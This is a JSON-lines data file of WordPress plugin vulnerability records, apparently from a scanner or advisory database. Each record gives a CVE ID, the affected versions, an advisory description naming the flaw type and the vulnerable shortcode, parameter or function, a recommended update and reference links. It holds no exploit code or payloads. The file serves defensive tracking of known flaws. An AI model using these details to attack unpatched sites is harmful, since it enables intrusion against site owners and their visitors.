{"CVE_ID":"CVE-2025-1527","slug":"woolentor-addons","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +20 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to a Stored DOM-Based Cross-Site Scripting via the plugin's Flash Sale Countdown module in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253711\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/flash-sale\\\/assets\\\/js\\\/flash-sale.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253711\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/flash-sale\\\/assets\\\/js\\\/flash-sale.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3405b50-a3f0-4280-8a34-ed86ce3d4db4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3405b50-a3f0-4280-8a34-ed86ce3d4db4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"sticky-buttons","versionEndExcluding":"3.1.1","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4171","slug":"where-did-they-go-from-here","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The WZ Followed Posts \u2013 Display what visitors are reading plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wfp' shortcode in all versions up to, and including, 3.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3287192%40where-did-they-go-from-here&new=3287192%40where-did-they-go-from-here&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3287192%40where-did-they-go-from-here&new=3287192%40where-did-they-go-from-here&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b27a7b1-6fee-433f-8102-4a3745a8dfed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b27a7b1-6fee-433f-8102-4a3745a8dfed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3499","slug":"elementskit-lite","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.1.0 via the generate_navigation_markup function of the Onepage Scroll module. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6158ec37-a6fb-42f9-bab6-bf547ea28ea0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6158ec37-a6fb-42f9-bab6-bf547ea28ea0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070789\\\/elementskit-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3070789\\\/elementskit-lite\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6692","slug":"ultimate-blocks","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The Ultimate Blocks \u2013 WordPress Blocks Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tab anchor metabox in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33e7006f-3fb9-4493-9ce5-67698c877159?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33e7006f-3fb9-4493-9ce5-67698c877159?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022998%40ultimate-blocks%2Ftrunk&old=3016254%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3022998%40ultimate-blocks%2Ftrunk&old=3016254%40ultimate-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1506","slug":"wp-social","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.0. This is due to missing or incorrect nonce validation on the counter_access_key_setup() function. This makes it possible for unauthenticated attackers to update social login provider settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.9\\\/inc\\\/counter.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.9\\\/inc\\\/counter.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246155\\\/wp-social\\\/trunk\\\/inc\\\/counter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246155\\\/wp-social\\\/trunk\\\/inc\\\/counter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669833b3-1689-4051-8990-c6eddae4858f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/669833b3-1689-4051-8990-c6eddae4858f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12820","slug":"google-distance-calculator","versionImpact":"3.1","versionEndExcluding":"3.1.1","description":"The MK Google Directions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'MKGD' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246361\\\/google-distance-calculator\\\/tags\\\/3.1.1\\\/mk-google-directions.php?old=3046209&old_path=google-distance-calculator%2Ftags%2F3.1%2Fmk-google-directions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246361\\\/google-distance-calculator\\\/tags\\\/3.1.1\\\/mk-google-directions.php?old=3046209&old_path=google-distance-calculator%2Ftags%2F3.1%2Fmk-google-directions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b3570c-cd8e-4dec-bbad-6374c44530bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b3570c-cd8e-4dec-bbad-6374c44530bd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36751","slug":"coupon-creator","versionEndExcluding":"3.1.1","description":"The Coupon Creator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1. This is due to missing or incorrect nonce validation on the save_meta() function. This makes it possible for unauthenticated attackers to save meta fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368658\\\/coupon-creator\\\/tags\\\/2.5.2.1\\\/plugin-engine\\\/src\\\/Pngx\\\/Admin\\\/Meta.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368658\\\/coupon-creator\\\/tags\\\/2.5.2.1\\\/plugin-engine\\\/src\\\/Pngx\\\/Admin\\\/Meta.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab57f010-4fd2-40c2-950f-c03888521c8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab57f010-4fd2-40c2-950f-c03888521c8f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12452","slug":"ziggeo","versionImpact":"3.1","versionEndExcluding":"3.1.1","description":"The Ziggeo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ziggeo_event' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ziggeo\\\/tags\\\/3.1\\\/core\\\/events.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ziggeo\\\/tags\\\/3.1\\\/core\\\/events.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242184%40ziggeo&new=3242184%40ziggeo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242184%40ziggeo&new=3242184%40ziggeo&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be82095d-2b15-432e-a667-523286fa9629?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be82095d-2b15-432e-a667-523286fa9629?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3808","slug":"porto-functionality","versionImpact":"3.1.0","versionEndExcluding":"3.1.1","description":"The Porto Theme - Functionality plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.1.0 via the 'porto_portfolios' shortcode 'portfolio_layout' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 3.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea96f84-f75b-4f02-9ca8-f8fda439d565?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fea96f84-f75b-4f02-9ca8-f8fda439d565?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0380","slug":"easy-digital-downloads","versionEndExcluding":"3.1.0.5","description":"The Easy Digital Downloads WordPress plugin before 3.1.0.5 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3256e090-1131-459d-ade5-f052cd5d189f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3256e090-1131-459d-ade5-f052cd5d189f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3599","slug":"gdpr-cookie-consent","versionImpact":"3.0.2","versionEndExcluding":"3.1.0","description":"The WP Cookie Consent ( for GDPR, CCPA & ePrivacy ) plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the gdpr_policy_process_delete() function in all versions up to, and including, 3.0.2. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b9abbf1-d9f5-4406-9d0c-bc2f9891d0e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b9abbf1-d9f5-4406-9d0c-bc2f9891d0e8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071278\\\/gdpr-cookie-consent\\\/tags\\\/3.1.0\\\/admin\\\/class-gdpr-cookie-consent-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071278\\\/gdpr-cookie-consent\\\/tags\\\/3.1.0\\\/admin\\\/class-gdpr-cookie-consent-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4390","slug":"depicter","versionImpact":"3.0.2","versionEndExcluding":"3.1.0","description":"The Slider and Carousel slider by Depicter plugin for WordPress is vulnerable to Arbitrary Nonce Generation in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with contributor access and above, to generate a valid nonce for any WordPress action\/function. This could be used to invoke functionality that is protected only by nonce checks.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd7c3a5d-b8aa-45cb-983c-55ba7e3d72f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd7c3a5d-b8aa-45cb-983c-55ba7e3d72f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/SecurityAjaxController.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/depicter\\\/trunk\\\/app\\\/src\\\/Controllers\\\/Ajax\\\/SecurityAjaxController.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3103357%40depicter%2Ftrunk&old=3090538%40depicter%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3103357%40depicter%2Ftrunk&old=3090538%40depicter%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0521","slug":"post-smtp","versionImpact":"3.0.2","versionEndExcluding":"3.1.0","description":"The Post SMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the from and subject parameter in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3237626%40post-smtp%2Ftrunk&old=3229076%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3237626%40post-smtp%2Ftrunk&old=3229076%40post-smtp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366dfbf1-870c-4ce3-abc4-a2b2f4e72175?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/366dfbf1-870c-4ce3-abc4-a2b2f4e72175?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13556","slug":"affiliate-links","versionImpact":"3.0.1","versionEndExcluding":"3.1.0","description":"The Affiliate Links: WordPress Plugin for Link Cloaking and Link Management plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.0.1 via deserialization of untrusted input from an file export. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238736%40affiliate-links&new=3238736%40affiliate-links&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3238736%40affiliate-links&new=3238736%40affiliate-links&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/290027c3-6b0a-43b9-9220-b8c641eb73f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/290027c3-6b0a-43b9-9220-b8c641eb73f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3809","slug":"porto-functionality","versionImpact":"3.0.9","versionEndExcluding":"3.1.0","description":"The Porto Theme - Functionality plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.0.9 via the 'slideshow_type' post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 3.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5cdd3c1-6353-4bee-a4f9-5b7972f0970c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5cdd3c1-6353-4bee-a4f9-5b7972f0970c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/porto-responsive-wordpress-ecommerce-theme\\\/9207399\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5126","slug":"delete-me","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Delete Me plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'plugin_delete_me' shortcode in versions up to, and including, 3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The shortcode is not displayed to administrators, so it cannot be used against administrator users.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5123a7-8eb4-481e-88fe-6310be37a077?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a5123a7-8eb4-481e-88fe-6310be37a077?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-me\\\/tags\\\/3.0\\\/inc\\\/shortcode.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-me\\\/tags\\\/3.0\\\/inc\\\/shortcode.php#L83\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5430","slug":"jquery-news-ticker","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Jquery news ticker plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985559\\\/jquery-news-ticker#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985559\\\/jquery-news-ticker#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7f8739-7f40-40a7-952e-002ea3b82ac7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7f8739-7f40-40a7-952e-002ea3b82ac7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jquery-news-ticker\\\/trunk\\\/jquery-news-ticker.php?rev=2827068#L92\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2018-25105","slug":"wp-file-manager","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The File Manager plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in the \/inc\/root.php file in versions up to, and including, 3.0. This makes it possible for unauthenticated attackers to download arbitrary files from the server and upload arbitrary files that can be used for remote code execution.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56d5a2f-ae13-4523-bc4a-17bb2fb4c6f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a56d5a2f-ae13-4523-bc4a-17bb2fb4c6f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1942390%40wp-file-manager&new=1942390%40wp-file-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1942390%40wp-file-manager&new=1942390%40wp-file-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6626","slug":"gm-woocommerce-quote-popup","versionImpact":"3.0","versionEndExcluding":"3.1","description":"The Product Enquiry for WooCommerce WordPress plugin before 3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/327ae124-79eb-4e07-b029-e4f543cbd356\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/327ae124-79eb-4e07-b029-e4f543cbd356\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5659","slug":"interact-quiz-embed","versionImpact":"3.0.7","versionEndExcluding":"3.1","description":"The Interact: Embed A Quiz On Your Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interact-quiz' shortcode in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ba1a39-ddb0-4661-8104-d8bb71710e0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69ba1a39-ddb0-4661-8104-d8bb71710e0c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interact-quiz-embed\\\/tags\\\/3.0.7\\\/interact-quiz-embed.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/interact-quiz-embed\\\/tags\\\/3.0.7\\\/interact-quiz-embed.php#L53\",\"refsource\":\"\",\"tags\":[]}]"}
